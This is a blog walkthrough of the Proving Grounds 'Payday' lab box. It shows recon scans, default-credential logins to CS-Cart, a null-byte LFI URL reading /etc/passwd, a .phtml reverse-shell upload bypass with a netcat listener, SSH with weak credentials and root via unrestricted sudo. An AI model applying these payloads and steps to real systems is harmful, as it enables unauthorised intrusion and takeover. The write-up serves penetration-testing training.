Post

PG - Payday

Gained initial access by exploiting an insecure file upload with extension bypass. Used weak credentials to move laterally to another user account, then escalated privileges by abusing insecure sudo -l permissions

Posted
By 0xdagg3r
11 min read
PG - Payday

Recon

nmap finds few open ports:

nmap -Pn -sS -sC -sV -T4 -vvv -p- $TARGET

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195

PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 61 OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
|   1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAJedhI7AqO17xYjoo1RT33T4x4g7b+u71OK2CNJW//eoNBEibTyvqAmBDobETDcAZXHMdEMTvINlM7ZjGV4EAhfE57Fkkhae8LvML3Ae0OVsa/l4pWizwGEEkHVujayyHZlwqXnK1ePV9rKnc6VJUYL4yHPMEwhNDme92hxlEWBbAAAAFQCyn5tJyWy2EZXJLQgS/xpiBH36uQAAAIBcUdaW5kLYjbgbalp1Z3cMQuuiG/YhaLxNBMh75vM/SrrsATeqEIUlBNBgDel+fUSPbr2iCQ+I8xrk6CNvcXtugMfJSF78pH42VN5GrLKzNZeoyGzywEhcFKHAqcRMntyEZJ/BiLWRunRcnKznMMa00/d3xRLvTFKUmUjdW1IebAAAAIBRhyvDlRI873HIhNd8GiXY/kZyL+jDQle8ULF1Lk+H+EzKXMSPt0gMv8z2bpSD1XIB565rcFWlO+7q0BZFY+NLJAhMWAWxBE4Ib87uPUqeGvg6D8w6gZur84lpMg7P1KjyihIfY5tMCwfKkkaS418IPzhKtDUvtI0Vr6h3Wv0luA==
|   2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzGacK6NGRpMIVjkA/xYbfKDgeJeQzkJl25og4nQl+FV4ZbvXv6h0vCU+E8SPHKPL/WJAIqmL6hdQaTQiTDmhcKjecWBq9fX1Esb8cvlOPEzphl+wESfJx/lWYvLPBXz0ZdKfy2/O+0an9ua6jl3tDEFzeosHwIF8zDbaBL6/RzBV+0gkzA67OowtcaxoioYYPzsEaOAkAFjlaRMviUA3nzCvffG61KyqmAdwodl+rXyI4KHjQqinPYk5qmj9rO8LcLE/gWVRoRw4va6hbJ2V7e74Tt1HQ4V/FzhG1zrWdkI/qA65RMCw/0270w1PjYkfYl2ENJL6YHHosf4NCkfdbw==
80/tcp  open  http        syn-ack ttl 61 Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: CS-Cart. Powerful PHP shopping cart software
110/tcp open  pop3        syn-ack ttl 61 Dovecot pop3d
|_pop3-capabilities: CAPA STLS TOP SASL PIPELINING RESP-CODES UIDL
|_ssl-date: 2025-03-25T02:19:36+00:00; +8s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwHhcNMDgwNDI1MDIwMjQ4WhcNMDgwNTI1MDIwMjQ4WjCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMU3nxwLcuZqpwkOS9z97lvT
| yR3ByDzjPSVW/FDorKebyGqttioV9xUsO0ws+v8OfNrJbPaJZwZIF8tiRBIbMTJf
| TkSpCbmstakQmJFfI3HG9Hgp4AnmJbTPRla1HzYuRArDog/1zZZu/rk9bttIPU3K
| eDZWaNQE/5QSszIEv0pXAgMBAAEwDQYJKoZIhvcNAQEFBQADgYEAof/wZAH33zX6
| +sV9LEX3DBhRyyEHYBP1/zEG/gL4MONuNv1+thRYnkpKYc4BbUyO821YdWsUXLM1
| gVXXFxJdzZec+L+ouwXxhLOLCvS9xu+sNsqa+jfFmdHWikDpJ8EPf+tNh/jb2MbS
| tXYFup7cGHV+SdI/s5ho9Vdbr68NbW0=
|_-----END CERTIFICATE-----
139/tcp open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open  imap        syn-ack ttl 61 Dovecot imapd
|_ssl-date: 2025-03-25T02:19:36+00:00; +8s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwHhcNMDgwNDI1MDIwMjQ4WhcNMDgwNTI1MDIwMjQ4WjCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMU3nxwLcuZqpwkOS9z97lvT
| yR3ByDzjPSVW/FDorKebyGqttioV9xUsO0ws+v8OfNrJbPaJZwZIF8tiRBIbMTJf
| TkSpCbmstakQmJFfI3HG9Hgp4AnmJbTPRla1HzYuRArDog/1zZZu/rk9bttIPU3K
| eDZWaNQE/5QSszIEv0pXAgMBAAEwDQYJKoZIhvcNAQEFBQADgYEAof/wZAH33zX6
| +sV9LEX3DBhRyyEHYBP1/zEG/gL4MONuNv1+thRYnkpKYc4BbUyO821YdWsUXLM1
| gVXXFxJdzZec+L+ouwXxhLOLCvS9xu+sNsqa+jfFmdHWikDpJ8EPf+tNh/jb2MbS
| tXYFup7cGHV+SdI/s5ho9Vdbr68NbW0=
|_-----END CERTIFICATE-----
|_imap-capabilities: MULTIAPPEND completed UNSELECT Capability STARTTLS OK NAMESPACE LOGIN-REFERRALS LOGINDISABLEDA0001 CHILDREN IDLE LITERAL+ THREAD=REFERENCES IMAP4rev1 SORT SASL-IR
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
445/tcp open  netbios-ssn syn-ack ttl 61 Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open  ssl/imap    syn-ack ttl 61 Dovecot imapd
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwHhcNMDgwNDI1MDIwMjQ4WhcNMDgwNTI1MDIwMjQ4WjCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMU3nxwLcuZqpwkOS9z97lvT
| yR3ByDzjPSVW/FDorKebyGqttioV9xUsO0ws+v8OfNrJbPaJZwZIF8tiRBIbMTJf
| TkSpCbmstakQmJFfI3HG9Hgp4AnmJbTPRla1HzYuRArDog/1zZZu/rk9bttIPU3K
| eDZWaNQE/5QSszIEv0pXAgMBAAEwDQYJKoZIhvcNAQEFBQADgYEAof/wZAH33zX6
| +sV9LEX3DBhRyyEHYBP1/zEG/gL4MONuNv1+thRYnkpKYc4BbUyO821YdWsUXLM1
| gVXXFxJdzZec+L+ouwXxhLOLCvS9xu+sNsqa+jfFmdHWikDpJ8EPf+tNh/jb2MbS
| tXYFup7cGHV+SdI/s5ho9Vdbr68NbW0=
|_-----END CERTIFICATE-----
|_ssl-date: 2025-03-25T02:19:35+00:00; +7s from scanner time.
|_imap-capabilities: MULTIAPPEND UNSELECT completed Capability NAMESPACE AUTH=PLAINA0001 LOGIN-REFERRALS OK CHILDREN IDLE LITERAL+ THREAD=REFERENCES IMAP4rev1 SORT SASL-IR
995/tcp open  ssl/pop3    syn-ack ttl 61 Dovecot pop3d
|_ssl-date: 2025-03-25T02:19:36+00:00; +8s from scanner time.
|_pop3-capabilities: CAPA SASL(PLAIN) TOP USER PIPELINING RESP-CODES UIDL
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwHhcNMDgwNDI1MDIwMjQ4WhcNMDgwNTI1MDIwMjQ4WjCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMU3nxwLcuZqpwkOS9z97lvT
| yR3ByDzjPSVW/FDorKebyGqttioV9xUsO0ws+v8OfNrJbPaJZwZIF8tiRBIbMTJf
| TkSpCbmstakQmJFfI3HG9Hgp4AnmJbTPRla1HzYuRArDog/1zZZu/rk9bttIPU3K
| eDZWaNQE/5QSszIEv0pXAgMBAAEwDQYJKoZIhvcNAQEFBQADgYEAof/wZAH33zX6
| +sV9LEX3DBhRyyEHYBP1/zEG/gL4MONuNv1+thRYnkpKYc4BbUyO821YdWsUXLM1
| gVXXFxJdzZec+L+ouwXxhLOLCvS9xu+sNsqa+jfFmdHWikDpJ8EPf+tNh/jb2MbS
| tXYFup7cGHV+SdI/s5ho9Vdbr68NbW0=
|_-----END CERTIFICATE-----
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 40m07s, deviation: 1h37m59s, median: 7s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 38412/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 41194/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 26461/udp): CLEAN (Failed to receive data)
|   Check 4 (port 11981/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.26a)
|   Computer name: payday
|   NetBIOS computer name:
|   Domain name:
|   FQDN: payday
|_  System time: 2025-03-24T22:19:32-04:00

Based on the scan results, I can confirm that I am attacking a linux machine.

There is Null session on SMB but there is no available shares to go on.

HTTP port 80 shows that it is running CS-Cart shopping cart software.

cs cart CS-Cart homepage

I’ll poke around to learn its features.

Using admin:admin managed to login to the portal. It is good pactice to do a default credential password spray whenever there is a login form.

It did not give me much to go on. I’ll proceed to do directory fuzzing to look for any hidden directory.

ffuf -u http://$TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.140.39/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/combined_directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

images                  [Status: 301, Size: 335, Words: 21, Lines: 10, Duration: 54ms]
include                 [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 48ms]
catalog                 [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 50ms]
install                 [Status: 200, Size: 7731, Words: 346, Lines: 220, Duration: 72ms]
config                  [Status: 200, Size: 13, Words: 2, Lines: 1, Duration: 47ms]
classes                 [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 49ms]
var                     [Status: 301, Size: 332, Words: 21, Lines: 10, Duration: 49ms]
skins                   [Status: 301, Size: 334, Words: 21, Lines: 10, Duration: 48ms]
core                    [Status: 301, Size: 333, Words: 21, Lines: 10, Duration: 47ms]
image                   [Status: 200, Size: 1971, Words: 16, Lines: 12, Duration: 68ms]
index                   [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 77ms]
admin                   [Status: 200, Size: 9483, Words: 393, Lines: 263, Duration: 1247ms]
payments                [Status: 301, Size: 337, Words: 21, Lines: 10, Duration: 47ms]
addons                  [Status: 301, Size: 335, Words: 21, Lines: 10, Duration: 46ms]
chart                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 88ms]
shippings               [Status: 301, Size: 338, Words: 21, Lines: 10, Duration: 49ms]
init                    [Status: 200, Size: 13, Words: 2, Lines: 1, Duration: 48ms]
server-status           [Status: 403, Size: 313, Words: 22, Lines: 11, Duration: 51ms]
apache2-default         [Status: 301, Size: 344, Words: 21, Lines: 10, Duration: 45ms]
targets                 [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 47ms]
prepare                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 46ms]
...[snip]...

One of the directory stands out is /admin

Visiting the URL got me into the admin login page

hidden admin login page Hidden admin login page

I spray with default credential and managed to login with admin:admin

admin control panel Admin control panel

Now I have more access in the platform. I’ll poke around the web app for any vectors.

There is a upload function in template_editor. There might be insecure file upload vulnerability and I can try to bypass the extension check but for now I’ll note this down and come back later on.

file upload Possible vector via file upload

There is phpinfo in /admin.php?target=tools&mode=phpinfo. It gives me a peek into the server hosting this web app.

Usually there are few things worth checking in phpinfo:

  1. Environment variable like ALLUSERSPROFILE for any possible username
  2. upload_tmp_dir to see which directory the file is being uploaded
  3. allow_url_fopen to see if it is on that might leads to RFI

I only found that allow_url_fopen is set to On which might have possible RFI.

I am unable to find any app version beside the copyright at the bottom so I’ll use the year to look for any possible vulnerability.

exploit-result Exploit search results

The first few results indicated that in version 1.3.3 have multiple vulnerability including authenticated RCE and RFI and that might be the version that my target is running.

The RCE exploit shows that it is a vulnerability in file manager which I’m assuming is the template_editor.

Another exploit shows LFI in class.cs_phpmailer.php

Exploitation

I’ll test RFI first.

After alot of trial and error, adding null byte %00 seems to be working and I got the LFI.

http://192.168.140.39/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00

lfi poc LFI on class.cs_phpmailer

There is a user patrick that is a user in the server. I tried to enumerate for any private ssh key to no avail.

Shell as www-data

I’ll try to go for the authenticated RCE next. The explanation lacks some info but I found a better instructions to exploit it. Reference in this gist

  1. Visit “cs-cart” /admin.php and login (Remember: You need to login on ADMIN section not on the regular USER section)
  2. Under Look and Feel section click on “template editor
  3. And under that section, upload your malicious .php file, make sure you rename it to .phtml before you upload
  4. If successful, you should be able to get a RCE
  5. For example, grab this file and rename it to whoami.phtml
  6. Now, visit http://[victim]/skins/whoami.phtml
  7. And you should see www-data or apache etc as the output

I’ll use the Ivan Sincek PHP reverse shell in revshells as I find it very reliable compared to pentestmonkey version

Before I upload the reverse shell, I’ll use penelope to catch reverse shell

python3 penelope.py

rlwrap nc -nvlp 4444

payload upload Upload reverse shell payload

Accessing http://192.168.140.39/skins/shell.phtml after the shell has been uploaded and I got shell as www-data

reverse shell Reverse shell connection

Shell as patrick

I’ll try to move laterally to user patrick as I did not find any vector to priv esc.

Earlier I got in to the admin portal with default credential, I tested patrick:patrick as credential and managed to get ssh session.

ssh patrick@192.168.140.39

ssh session SSH session as patrick

Shell as root

Running sudo -l reveal that I can run all command as sudo, meaning I have root access to the machine.

1
2
3

...[snip]...
User patrick may run the following commands on this host:
    (ALL) ALL
Proving Grounds
linux public exploit search sudo weak credential
This post is licensed under CC BY 4.0 by the author.